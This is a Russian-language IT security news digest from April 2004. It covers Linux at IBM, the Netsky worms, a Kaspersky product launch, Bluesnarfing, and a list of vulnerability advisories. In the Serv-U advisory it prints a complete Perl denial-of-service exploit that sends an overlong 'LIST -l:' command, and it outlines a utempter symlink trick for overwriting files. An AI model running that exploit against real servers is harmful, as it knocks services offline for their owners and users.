Внедрение Linux внутри IBM идет медленно

Big Blue переводит некоторые свои внутренние приложения на Linux, но на это требуется время, сказал один из топ-менеджеров компании, выступая на конференции пользователей и разработчиков Linux в Лондоне.

На этой неделе компания сообщила, что IBM не спешит переводить на программное обеспечение с открытым исходным кодом весь свой персонал, но внедряет Linux в таких местах, где она сулит бизнес-преимущества.

В среду Суржит Чана, вице-президент IBM по маркетинговой стратегии и планированию, настаивал на том, что внедрение Linux на рабочих местах «не религиозный вопрос». В начале года из IBM просочился внутренний меморандум, показавший, что высшее руководство компании всерьез оценивает возможность установки Linux на все рабочие места до конца 2005 года. Впоследствии IBM утверждала, что на самом деле планы компании не идут так далеко, и это положение, судя по словам Чаны, пока не изменилось.

«Мы внедряем Linux там, где это имеет смысл», — сказал он. Понятно, что сюда относятся некоторые разработчики приложений. Еще одна позиция, которую IBM считает подходящей для перевода на Linux, это компьютерный аниматор. Другим сотрудникам придется пока посидеть на Windows.

«Мы бы сказали, что Linux готова для многих, но не для всех клиентских сегментов, — заявил на конференции Linux User and Developer Expo 2004, где выступал и Чана, менеджер IBM по стратегии маркетинга Linux-ПО Адам Джолланс.

Один из факторов, мешающих таким компаниям, как IBM, более активно внедрять Linux, заключается в том, что они уже закупили другое ПО, и эти инвестиции еще не списаны. Недавно IBM открыла в штате Нью-Йорк завод, целиком работающий на Linux. Так как это новое предприятие, внедрение на нем ПО open source более оправдано — там не надо заменять существующие системы, такие как Windows.

Пол Уотсон: слухи о скорой гибели Сети несколько преувеличены

Пол Уотсон, еще в прошлом году обнаруживший брешь в протоколе TCP, позволяющую злоумышленникам выводить из строя целые сегменты интернета, считает появившиеся вчера публикации в прессе, в которых предсказывается скорая гибель Сети, "истерическими".

Дело в том, пишет CNET, цитирующая слова Уотсона, что ошибка в протоколе TCP была обнаружена достаточно давно, чтобы разработчики успели разобраться в ее сути и подготовить соответствующие заплатки. В ходе последних двух недель ведущие провайдеры всего мира в обстановке строжайшей секретности провели работы по установке новых версий программного обеспечения на маршрутизаторы, отвечающие за управление сетевым трафиком, и сейчас находятся вне опасности. Информация об ошибке была разглашена только после того, как ошибка была ликвидирована, а "штормовое предупреждение" было выпущено Национальным центром координации инфраструктурной безопасности лишь для того, чтобы привлечь внимание особо безалаберных администраторов.

Разумеется, если бы индустрия и дальше продолжала игнорировать проблему, то безответственные хакеры действительно могли бы устроить настоящий хаос в глобальном масштабе, однако на сегодняшний день, по мнению Уотсона, "реальная угроза для сети минимальна". Под угрозой все еще находятся сети мелких провайдеров и маршрутизаторы, не успевших обновить программное обеспечение, но даже если они и подвергнутся атаке, им потребуется всего несколько дней, чтобы оправиться от удара. Как известно, компания Cisco Systems, лидирующая на этом рынке, уже выпустила свежий вариант программного обеспечения, закрывающего найденную брешь в протоколе, а другие крупные компании, вроде Juniper Networks, Hitachi и NEC, в настоящее время "разбираются в сути вопроса".

В принципе, никаких разъяснений и не потребовалось бы, если бы отдельные товарищи внимательно читали первоисточники, обращая внимание на согласование времен.

Вирус Netsky "заговорил" на девяти языках

Спустя буквально три дня после обнаружения двадцать третьей по счету модификации вредоносной программы Netsky, антивирусные компании зафиксировали во Всемирной сети появление еще двух версий червя - Netsky.Х и Netsky.Y.

По своим функциональным возможностям, новые варианты вируса очень близки к предшественникам. В частности, Netsky.Х и Netsky.Y распространяются по электронной почте, рассылая письма с вложениями посредством встроенного SMTP-сервера. При поиске адресов производится сканирование всех накопителей инфицированной машины, за исключением оптических дисков. В период с 28 по 30 апреля 2004 года вредоносные программы постараются организовать DoS-атаки на сайты www.nibis.de, www.medinfo.ufl.edu и www.educa.ch. Черви представляют угрозу для пользователей операционных систем Windows 95, 98, Me, 2000, NT, Server 2003 и XP. Компьютеры с Mac OS и Linux вирусы заражать не способны.

Основным же отличием Netsky.Х и Netsky.Y от более ранних модификаций является возможность генерации сообщений на девяти различных языках. В частности, вирусы знают английский, шведский, финский, польский, норвежский, португальский, итальянский, французский и немецкий. Причем фразы в сформированных вредоносных письмах зачастую построены неправильно, кроме того, присутствуют орфографические и грамматические ошибки. Отсюда можно сделать вывод, что для составления списков возможных текстовых строк авторы Netsky пользовались автопереводчиками.

Контрафактная продукция в домашних условиях

Сотрудники налоговой милиции Запорожской области обнаружили нелегальное производство фурнитуры для маркировки аудио- и видеопродукции. Нелегальную деятельность развернул в Мелитополе 22-летний предприниматель. Молодой человек снял у местной жительницы частный дом и установил там мощную компьютерную технику, с помощью которой тиражировал крупные партии поддельных контрольных марок и голографических элементов для компакт-дисков и использовал для комплектации контрафактной продукции.

По предварительной информации, поддельные диски махинатор скупал оптом в Москве и Харькове, а затем сам упаковывал их. Готовую продукцию он отправлял на продажу в магазины Мелитополя. Сотрудники налоговой милиции изъяли 5 тысяч поддельных компакт-дисков, а также свыше 2-х тысяч фальсифицированных контрольных марок и голографических элементов. По факту незаконной деятельности возбуждено уголовное дело по статье, предусматривающей лишение свободы на срок до четырех лет.

Symantec не спешит с залатыванием четырех "критических" дыр в своем защитном ПО

Дыры в системах защиты есть, наверное, во всех программах. Но пользователь особенно болезненно реагирует на дыры в тех программах, которые вроде бы должны обеспечивать защиту его компьютера (от вирусов, от атак хакеров и т.п.). В антивирусах и защитных программах от Symantec уже не раз находили дыры разной степени серьезности. На этой неделе компания eEye Digital Security, специализирующаяся на проблемах компьютерной защиты, объявил об обнаружении четырех "критических" дыр в трех приложениях производства Symantec - Norton Internet Security 2004, Norton Internet Security 2004 Professional и Norton Personal Firewall 2004.

eEye Digital отказалась сообщать сколько-нибудь подробную информацию об этих дырах до тех пор, пока Symantec не выпустит для них заплатки, чтобы не давать подсказок хакерам. Известно только, что три из этих четырех дыр позволяют взломщику удаленным образом изменить настройки по умолчанию вышеупомянутых программ и получить доступ к компьютеру пользователя. Четвертой дырой хакер тоже может воспользоваться удаленным образом. Эта дыра тоже открывается, если соответствующая программа инсталлирована на компьютер пользователя с установками по умолчанию. В этом случае взломщик может организовать против компьютера жертвы атаку типа отказ в обслуживании (DoS).

eEye Digital также сообщила, что подробная информация об этих четырех дырах была отправлена в Symantec полтора месяца назад, но за это время Symantec так и не выпустила заплаток для них.

Антивирус Касперского 5.0: революционные технологии борьбы с вредоносными программами

"Лаборатория Касперского", российский разработчик систем защиты от вирусов, хакерcких атак и спама, сообщает о выпуске Антивируса Касперского(r) 5.0 - нового поколения антивирусных программ для операционной системы Windows. Представленная версия продукта органично сочетает уникальную функциональность, новый пользовательский интерфейс и ставший легендарным уровень защиты от вирусов. В совокупности эти характеристики еще раз подтверждают позиции Антивируса Касперского как самой надежной антивирусной программы и однозначно выводят продукт в лидеры в общей оценке потребительских качеств.

"В Антивирусе Касперского 5.0 воплощены результаты многолетних исследований ведущих мировых экспертов в области защиты от вредоносных программ. В продукте нашли отражение уникальные технологии увеличения производительности антивируса, новый подход к обеспечению эргономичности управления программой, а также интегрированы эффективные средства борьбы не только с существующими, но и потенциальными угрозами", - сказала Наталья Касперская, генеральный директор "Лаборатории Касперского".

Быстрее в три раза

В пятом поколении антивирусных систем "Лаборатории Касперского" практически решен главный недостаток современных антивирусов - снижение производительности компьютеров из-за необходимости фоновой проверки больших объемов данных. Благодаря интеграции уникальных технологий обработки файлов iChecker, iStream и iCache, Антивирус Касперского работает в среднем в три раза быстрее и требует в 2 раза меньше оперативной памяти, чем предыдущие версии, несмотря на возросший уровень защиты и расширение функциональности. В основе этих технологий лежит интеллектуальное ядро распознавания целостности файла и взаимодействия с кэш-менеджером операционной системы. Это позволяет избежать избыточного сканирования заведомо чистых файлов и максимально использовать ресурсы операционной системы для увеличения производительности антивируса.

Новый интерфейс с Советом Эксперта

Защита от современных вирусных угроз является очень сложной задачей и технологии ее решения доступны для понимания только профессионалам. "Лаборатория Касперского" провела крупномасштабное международное исследование пользовательских предпочтений и разработала идеальный вариант интерфейса, который сочетает удобство, прозрачность и, в то же время, позволяет без труда управлять всем встроенным арсеналом средств защиты от вирусов при помощи уникальной системы Совета Эксперта.

Выполненный в стиле Windows XP, новый пользовательский интерфейс Антивируса Касперского отличается исключительной простотой, интуитивной понятностью и привлекательным дизайном. Все технические подробности защиты органично адаптированы для понимания даже начинающими пользователями и реализованы в 3-компонентном графическом меню. Меню позволяет одновременно управлять всеми элементами программы из единого центра, а окно Совета Эксперта в масштабе реального времени дает актуальные рекомендации по настройке и обновлению Антивируса Касперского.

Для максимального упрощения работы с программой в процессе настройки пользователю предлагается 3 предустановленных уровня безопасности: "Максимальная скорость" (проверка только основных компонентов компьютера), "Максимальная защита" (полная проверка компьютера) и "Рекомендованный" (оптимальный уровень с точки зрения временных затрат и глубины проверки). Выбор уровня производится простым переключением указателя, после чего программа автоматически изменяет все многочисленные внутренние настройки. Это позволяет значительно экономить время пользователя и не требует глубоких знаний для работы с Антивирусом Касперского.

Больше защиты от почтовых угроз

Антивирус Касперского 5.0 содержит эффективный ответ на возросшую опасность электронной почты как основного источника вирусной опасности. Новая версия программы содержит универсальный модуль защиты почты MailChecker Traffic Monitor, который решает сразу две задачи - защиты и совместимости. С одной стороны, модуль направляет мощный сканирующий потенциал антивирусных технологий "Лаборатории Касперского" на проверку электронной корреспонденции. С другой стороны, он исключает необходимость дополнительных затрат времени и сил для встраивания защиты в установленную на компьютере почтовую программу. После установки Антивируса Касперского MailChecker Traffic Monitor встраивается в качестве фильтра между внешним почтовым сервером и почтовым клиентом, и автоматически проверяет все получаемые и отправляемые письма. Таким образом, достигается максимальная совместимость со всеми почтовыми программами, использующими протоколы SMTP или POP3.

От "Касперского" не запакуешься

С каждым годом увеличивается число вирусных атак с использованием вредоносных программ, упакованных специальными утилитами сжатия и архивации. Самый эффективный способ борьбы с ними - использование технологии распаковки и выявления реального содержимого проверяемых объектов. Антивирус Касперского 5.0 содержит новую функцию для борьбы с этой угрозой - лечение не только упакованных, но и архивированных файлов, в том числе наиболее популярных форматов ZIP, ARJ, RAR и CAB. Это позволяет удалить вредоносный код автоматически, без необходимости "пересборки" архива.

Новые базы точно в срок

Общеизвестно, что частота обновлений антивирусной базы - ключевой фактор надежности защиты. "Лаборатория Касперского" предоставляет пользователям уникальный сервис - регулярные обновления каждые три часа, а также срочные обновления (число которых не лимитировано) для отражения атак самых новых вирусов. В Антивирус Касперского 5.0 внедрена не имеющая аналогов технология KeepUp2Date - система управления загрузкой обновлений, которая обеспечивает бесперебойную и максимально удобную актуализацию программы.

Обновление может осуществляться как вручную, по требованию пользователя, так и автоматически, с помощью встроенного планировщика задач с любой заданной регулярностью. Благодаря технологии KeepUp2Date предметом актуализации могут быть как антивирусные базы, так и исполняемые модули программы (антивирусное ядро). Перед началом их загрузки Антивирус Касперского самостоятельно определяет самый быстрый сервер обновлений для данного компьютера. В случае разрыва связи процесс загрузки возобновляется с места обрыва. В результате Антивирус Касперского 5.0 обеспечивает своевременную и устойчивую загрузку всех дополнений для оперативного отражения новых угроз компьютерной безопасности.

И другие полезные функции

В Антивирусе Касперского 5.0 модернизации подверглись и многие другие компоненты программы. В частности, внедрена новая интерактивная справочная система, предлагающая пошаговые инструкции по работе, а также доступ к крупнейшей в мире Вирусной Энциклопедии Касперского. Существенно усовершенствованы функции модуля карантина и резервного копирования для надежной изоляции вредоносных кодов. Оптимизирована система обработки зараженных и подозрительных объектов в процессе сканирования. Улучшена поддержка кодировки UNICODE, что позволяет Антивирусу Касперского более эффективно работать на любых платформах и, в том числе, любых версиях Windows (в особенности китайской, японской, корейской и других восточных языков). Кроме того, в новой версии продукта представлена функция корректной установки в случае обнаружении на компьютере антивирусных программ других производителей.

"Мы рады представить Антивирус Касперского 5.0 и уверены, что новая версия программы не только будет соответствовать, но и превзойдет ожидания даже самых взыскательных пользователей, - сказал Денис Зенкин, руководитель информационной службы "Лаборатории Касперского", - Высокие потребительские качества нашего нового продукта поистине устанавливают новые стандарты для антивирусов в плане ресурсопотребления и надежности защиты, от чего, в конечном счете, выигрывают пользователи".

Зарегистрированные пользователи предыдущих версий продукта могут бесплатно загрузить и установить Антивирус Касперского 5.0 Personal.

Хакеры угрожают мобильникам

Информация, хранящаяся в памяти мобильных телефонов, может быть перехвачена хакерами, которые находятся на расстоянии в несколько десятков метров от объекта.

Автором этого тревожного открытия является глава лондонской компании в сфере безопасности A.L.Digital Адам Лори, который выяснил, что любой мобильный телефонный аппарат, использующий технологию Bluetooth, может подвергнуться атаке хакеров. Для перехвата информации взломщики используют технику, получившую название Bluesnarfing. С ее помощью злоумышленник получает доступ к телефонным номерам, данным записной книжки и другим конфиденциальным данным, содержащимся в телефонном аппарате абонента. Хакер может незаметно для владельца считывать и менять содержимое памяти телефона. Причем хакеры могут даже отправлять через атакованный аппарат SMS-сообщения.

Адам Лори выяснил, что самыми уязвимыми являются аппараты типа Sony Ericsson T68, R520m, T68i, T610, Z1010, Z600 и Nokia 6310, 6310i, 7650, 8910. Однако представители Sony Ericsson заявили, что указанная проблема несущественна и что в новых аппаратах указанный недостаток устранен, а владельцы существующих моделей должны будут обновить программное обеспечение своих мобильников.

26 - 29 апреля 2004 года. В «Экспоцентре» на Красной Пресне пройдет 15-я международная неделя информационных технологий «IT-Week-2004», организованная компанией ITE Group Plc при поддержке Министерства транспорта и связи РФ, Правительства Москвы и др.

«IT-WEEK» – один из крупнейших форумов в области информационных технологий, проходящих в России и странах СНГ. Ожидается, что в программных мероприятиях примут участие более 250 компаний из более чем 25 стран мира.

В рамках «IT-WEEK» состоятся пять международных выставок: «Personal Computing Expo», «Hardware & Peripherals Expo», «Software Expo», «Специализированная выставка CAD/CAM/CAE» и «eLearn Expo», а также две международные конференции – «eBusiness Russia», посвященная вопросам автоматизации бизнес-процессов и развития электронной коммерции, а также «eLearning Russia» – по вопросам внедрения информационных технологий в образовательных учреждениях различного уровня.

Microsoft Linux-сообществу: «Так держать!»

На конференции LinuxUser & Developer Expo в Лондоне местный системный инженер Microsoft Брэдли Типп сказал, что конкуренция полезна для всей индустрии программного обеспечения и ведет к повышению качества продуктов, сделанных в Редмонде. «Мне нравится, что Microsoft, когда у нее есть конкуренты, делает свою работу лучше и подходит к ней более творчески, так что пусть так оно идет и дальше», — заявил Типп. Это высказывание перекликается с точкой зрения, выраженной во вторник Мэттом Асеем, директором Linux-отделения Novell, который утверждает, что отсутствие альтернативных настольных операционных систем сделало Microsoft малоинициативной в части совершенствования своего спектра ПО. Типп участвовал в круглом столе в рамках конференции, где ряд представителей сообщества open source, включая Асея, высказывали свои соображения о будущем Linux на десктопе. Асей сказал, что проникновение Linux на рынок настольных ПК станет отражением прогресса операционной системы на рынке серверов трех-четырехлетней давности. «На рабочем столе сегодня практически нет конкуренции, — сказал он. — Но через два-три года она будет яростной». По словам Робина Уилтона, инженера-программиста отделения Java Desktop System Sun, укрепление позиций Linux на рынке ПК несет с собой многие выгоды. «Мы увидим больше выбора и конкуренции. Это хорошо», — сказал он. Один из участников круглого стола отметил, как трудно купить лаптоп, на котором не установлено проприетарное ПО. Джереми Эллисон из команды Samba в Hewlett-Packard согласен, что это проблема. Первое, что он сделал со своим рабочим лаптопом, — переформатировал его и удалил Windows. «Я очень сожалел, что не могу получить деньги назад. Это безобразие, что такой возможности не предоставляется», — сказал Эллисон. По его словам, НР недавно пообещала выпустить лаптопы с предустановленной версией Linux, и ИТ-индустрия скоро увидит «много всего от НР в этой области».

Удаленный отказ в обслуживании в Cisco SNMP в некоторых версиях CISCO IOS

Программа: Cisco Internetwork Operating System (IOS) 12.0S, 12.1E, 12.2, 12.2S, 12.3, 12.3B, и 12.3T. Опасность: Средняя Наличие эксплоита: Нет Описание: Уязвимость обнаружена в нескольких релизах Cisco Internetwork Operating System (IOS) в обработке SNMP запросов. Удаленный пользователь может перезагрузить устройство. Удаленный пользователь может послать специально обработанные SNMP запросы, чтобы перезагрузить целевое устройство. Уязвимы только некоторые версии IOS на CISCO маршрутизаторах и коммутаторах. Уязвимы 161 и 162 порт, а также случайный порт между 49152 и 59152. Чтобы эксплуатировать уязвимость через SNMPv1 и SNMPv2c, пользователь должен быть авторизован (используя SNMP community strings). Для эксплуатации через SNMPv3 авторизация не требуется. По умолчанию, устройство поддерживает операции с SNMP 1,2с и 3 версией. URL производителя: http://www.cisco.com/warp/public/707/cisco-sa-20040420-snmp.shtml Решение:Cisco опубликовал обновленную версию для 12.0S, 12.1E, 12.2, 12.2S, 12.3, 12.3B, и 12.3T. Подробнее: http://www.cisco.com/warp/public/707/cisco-sa-20040420-snmp.shtml

Спуфинг IP адресов в PHPbb форуме

Программа: phpBB 2.0.8a и более ранние версии Опасность: Низкая Наличие эксплоита: Да Описание: Уязвимость обнаружена в phpBB. Удаленный пользователь может подделать свой IP адрес, который будет зарегистрирован приложением. Удаленный пользователь может сконструировать специально обработанный 'X-Forwarded-For' HTTP заголовок, чтобы подменить свой реальный IP адрес произвольным IP адресом. В результате удаленный пользователь может обойти ограничения доступа к приложению по IP адресу. URL производителя: http://www.phpbb.com Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Удаленный отказ в обслуживании в Fastream NETFile Server

Программа: Fastream NETFile Server 6.5.1.980 Опасность: Средняя Наличие эксплоита: Да Описание: Уязвимость обнаружена в Fastream NETFile Server. Удаленный пользователь может вызвать условия отказа в обслуживании на целевой системе. Удаленный пользователь может послать USER и PASS информацию для несуществующего имени пользователя, чтобы аварийно завершить работу FTP сервера. URL производителя:http://www.fastream.com/netfileserver.htm Решение:Установите обновленную версию программы (6.5.1.981): http://www.fastream.com/download.htm

Удаленный отказ в обслуживании в Serv-U FTP server в обработке LIST '-l:' параметра

Программа: Serv-U FTP Server 5.0.0.4 и более ранние версии Опасность: Средняя Наличие эксплоита: Да Описание: Переполнение буфера обнаружено в Serv-U FTP server в обработке LIST '-l:' параметра. Удаленный авторизованный пользователь может аварийно завершить работу FTP сервера. Удаленный авторизованный пользователь, включая анонимного пользователя, может представить специально обработанное значение для 'LIST -l:' команды, длиною около 134 байта, чтобы вызвать ошибку доступа к памяти и аварийно завершить работу FTP сервера. Пример/Эксплоит: #!/usr/bin/perl use IO::Socket; $host = "192.168.1.243"; $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "2116", ); unless ($remote) { die "cannot connect to ftp daemon on $host" } print "connected\n"; while (<$remote>) { print $_; if (/220 /) { last; } } $remote->autoflush(1); my $ftp = "USER anonymous\r\n"; print $remote $ftp; print $ftp; sleep(1); while (<$remote>) { print $_; if (/331 /) { last; } } $ftp = join("", "PASS ", "a\@b.com", "\r\n"); print $remote $ftp; print $ftp; sleep(1); while (<$remote>) { print $_; if (/230 /) { last; } } my $ftp = join ("", "LIST -l:", "A"x(134), "\r\n"); print $remote $ftp; print $ftp; sleep(1); while (<$remote>) { print $_; if (/250 Done/) { last; } } close $remote; URL производителя:http://www.serv-u.com/ Решение:Установите обновленную версию программы (5.0.0.6): http://www.serv-u.com/customer/record.asp?prod=su

Удаленный отказ в обслуживании и небезопасное создание временных файлов в utempter

Программа: utempter Опасность: Низкая Наличие эксплоита: Нет Описание: Несколько уязвимостей обнаружено в utempter. Локальный пользователь может получить root привилегии или аварийно завершить работу процесса. Mandrake сообщает о нескольких потенциальных проблемах безопасности в utempter. Локальный пользователь может вызвать utempter с путем к устройству, содержащим некоторые строки ('/./', '/./', или '//'), чтобы аварийно завершить работу программы. Также локальный пользователь может сконструировать символьную ссылку из критического файла на системе к удаленному устройству (например '/dev/./tmp/tty0'), чтобы заставить utempter перезаписать ссылающийся файл с root привилегиями. Решение:Исправление существует пока только для Mandrake Linux.

Обход email фильтрации в Yahoo! Mail

Программа: Yahoo! Mail Опасность: Высокая Наличие эксплоита: Да Описание: Уязвимость обнаружена в Yahoo! Mail. Удаленный пользователь может обойти e-mail фильтрацию, чтобы выполнить произвольный код сценария и взять под контроль учетную запись целевого пользователя. eEye Digital Security сообщает, что удаленный пользователь может послать специально обработанное email сообщение к целевому пользователю, чтобы взять под контроль учетную запись целевого пользователя. Если е-mail сообщение превышает определенный размер, email фильтр не сможет заблокировать код сценария. URL производителя: http://www.yahoo.com/ Решение:Yahoo устранила уязвимость на своих серверах. Пользователю не требуется предпринимать каких либо дополнительных действий для устранения уязвимости.